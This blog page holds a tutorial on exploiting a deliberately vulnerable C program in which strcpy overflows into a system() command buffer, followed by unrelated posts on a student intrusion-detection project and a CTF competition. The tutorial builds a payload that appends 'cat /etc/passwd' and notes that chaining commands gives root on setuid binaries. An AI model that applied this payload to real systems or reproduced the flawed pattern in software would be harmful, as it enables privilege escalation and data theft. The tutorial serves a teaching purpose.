Buffer Overflow: Part 2

It has been very long since I have written something for the blog now, especially for the last post which I had mentioned that I would come back with a second part for it. Coming straight to the point, we have it here. 🙂
Just a recap of what we have talked about before on buffer over flow attacks: Any attack that exploits the factor that the copying of a string to a buffer is not checked for size(string length) limit can be included in the Buffer Overflow attack category.
At first we will look at a simple demonstration for the buffer overflow attack. For this we should have a vulnerable program written. Without loss of generality we can use the below program for demonstration and if required further study because as the program size increases, just the complexity to find the limit for buffer overflowing increases, mostly all other factors remains same.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
char cmd[10];
char buf[500];

strcpy(buf, argv[1]);
printf(“\n%s   [[[[[%s]]]]]]\n”, buf, cmd);
system(cmd);

return 0;
}

What this program does:
Simply copies the first command line argument to a character
variable buf of size 500. At a later stage, the command list stored in the
variable cmd is executed using the in-built function system.

Vulnerability:
* The length of the command line argument is not compared(checked) with
the size of the destination variable – buf. The part of the input that
overflows the buf array and gets overwritten into the cmd variable which
in-turn gets executed automatically using the system function.

  • If the final executable is a set-uid program, then the running
    process can automatically inherit the the permissions of the owner
    program. Say if the owner was root, the attacker gets superuser
    power.

What can be done:
Use strncpy instead of strcpy. Strncpy helps us to specify the length
of sting that is to be copied to the final destination. On the other
hand the default length for stcpy would the maximum string length.
(Refer MAN pages for strcpy and strncpy)

Below given is the input and output for various lengths of inputs(different
lengths for the string AAAA…AAA):

BufferOverFlow||22:41$ ./simple python2.7 -c 'print "A" * 510'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[p�k�]]]]]]
sh: $’p\205k\206\377\177′: command not found

BufferOverFlow||22:42$ ./simple python2.7 -c 'print "A" * 511'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[@�y$]]]]]]
sh: @�y$: command not found

BufferOverFlow||22:41$ ./simple python2.7 -c 'print "A" * 512'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[]]]]]]

BufferOverFlow||22:42$ ./simple python2.7 -c 'print "A" * 513'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[A]]]]]]
sh: A: command not found

BufferOverFlow||22:41$ ./simple python2.7 -c 'print "A" * 515'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[AAA]]]]]]
sh: AAA: command not found

This shows us that (for the above given program) when the input size becomes larger than or equal to 513(remember that the buffer length was 500charactors), the second variable, cmd starts to get overwritten by the excess or in our case the overflowed characters from the input. Therefore a conclusion can be made that if the input string can be formatted in such a way that a valid bash command can be appended to the last of 512 random characters, that will get executed .i.e., python2.7 -c 'print "A" * 512 + "&lt;required command&gt;"'

If the input was python2.7 -c 'print "A" * 512 + "cat /etc/passwd"', the attacker would be able to read the passwd file from the vulnerable machine.

NOTE: If space is to be used outside double or single quotes while giving input to the above program, remember to escape it using a backslash in the beginning.

This attack can be extended easily:
The statement terminating symbol for bash script is a semi colon. So, therefor, by using a semi colon at the end of each statement to make a small script to be given as the input, could prove to be more dangerous.

IMPORTANT:
“Do not use system() from a program with set-user-ID or set-group-ID privileges, because strange values for some environment variables might be used to subvert system integrity. Use the exec(3) family of functions instead, but not execlp(3) or execvp(3).  system() will not, in fact, work properly from programs with set-user-ID or set-group-ID privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup.  (Debian uses a modified bash which does not do this when invoked as sh.).” – Linux MAN Pages(SYSTEM(3))

“If the destination string of a strcpy() is not large enough, then anything might happen. Overflowing fixed-length string buffers is a favorite cracker technique for taking complete control of the machine. Any time a program reads or copies data into a buffer, the program first needs to check that there’s enough space. This may be unnecessary if  you  can  show that overflow is impossible, but be careful: programs can get changed over time, in ways that may make the impossible possible.” – Linux MAN Pages(STRCPY(3))

Most programs written in C would have some parts of it using a strcpy function call. A BOF attack can be designed to exploit this vulnerable function. In the next level we would remove the system function call and inject the code through the input(instead of the command list for system function call)which would get executed in the stack.

New link can be found at abijith-kp.github.io

Advertisements

major project starts

Here starts the next major step in my academic life: Major Project. I like to see this work to be very important but I have also seen people who don’t want to do even this. They just want to get into some group and just survives there by utilizing the energy of other teammates.

As always when I start off a project I have lot of expectation about it. Completion then developing it, putting it in the public domain and allowing others to improve the work. But most of these don’t work out… :D. But this time I really want to make a change to it. And I will.
This time I going with a project on Intrusion Detection System. We are planning to make it on top of STAT framework. There would be a need to implement a compiler for STAT Language* also. We actually has no materials other than few (old)papers relating to it. But we took this project only because we felt it would be very interesting to modal an attack on the basis of a new frame work. Initially after making a compiler for a subset of the language we would like to give Proof of Concept for few attack signatures. Then we would be able to assert that this compiler could be extended to detect many more different attack patterns.

In the first phase we have to identify which all attacks are we modeling and also should decide on the method to implement the compiler for STATL and we also need to decide on the subset of STATL that would help us represent the identified attack sequences.

I will update this post as it goes.

EDIT: Continuation of this post is added here.

*Similar existing language would be Snort.

Hacking at InCTF-Part1

Usually I just skim through my NITC mail, and checks only those send by my Class Representative or teachers. One day I read a mail forwarded by one of my seniors Karthik. It was about a hacking competition conducted by Amrutha University called InCTF which had 2 preliminary rounds and a final round. It was a Capture The Flag kind of competition. At that time I wasn’t in the mood of doing anything as I had to complete my lab assignments (which I was in a bad situation) and also if by any chance I got selected, the second round will be at the time of our exams so I ignored it. Later when I was searching for some thing I again came across this competition. This was the first time that this kind of an event comes into my notice(It was pretty interesting one… One that I know I will surely enjoy.. 🙂 ). Then I called one of my friend to tell him about this. I couldn’t make any decision then as I wanted to put my leg on both the boats – do it and not do it. He was very much excited to do the event. So we decided to meet one of seniors Jerin Shaji for getting the details of the event.

Oh….I forgot to tell, last year(2012) for sCTF, a variant of InCTF, the first prize was bagged by our college team consisting of Karthik, Jerin and Nithin.

Jerin told us many things : How they prepared, how they participated in the event, about the event format. He also gave us tips on how to attack the questions and also told us the techniques they used in the final CTF round.  We collected their last year’s question paper also. He was very supportive in all ways.

Till date two round of InCTF is completed. First round was a “learning round”. They gave us something like 2-3 months to learn few concepts and complete a question paper. The second round was a hands-on hacking round. It had different varieties of questions and most of which were of very high quality. Thanks to the support of all my friends our team “dcoder” got selected into the final round. We finished at 24th position out of 158 teams registered and the end of second round.

It was really great experience in participating in the event. The main thing I have to mention is that I learned few methods and techniques during this event. We also had to stay overnight in our lab during the second round, those were great. Those are the points in your life were you start thinking philosophically and talk like a philosopher. The main reason is that at some point we may be half asleep and wanted to answer to all the questions asked to you. These will be few moments that I will forever keep in my memories.

The more interesting part was that the second round was overlapping our exam time. So we had to it in between the exams. For my last exam I couldn’t even prepare much because I was very much involved in this. After I came back to my room I had a mild fewer also. Everything happened was indicating that I shouldn’t write my exams well(Omen kind of, just saying – I don’t believe in those).

Just excited in participating in the final round… 🙂

New link can be found at abijith-kp.github.io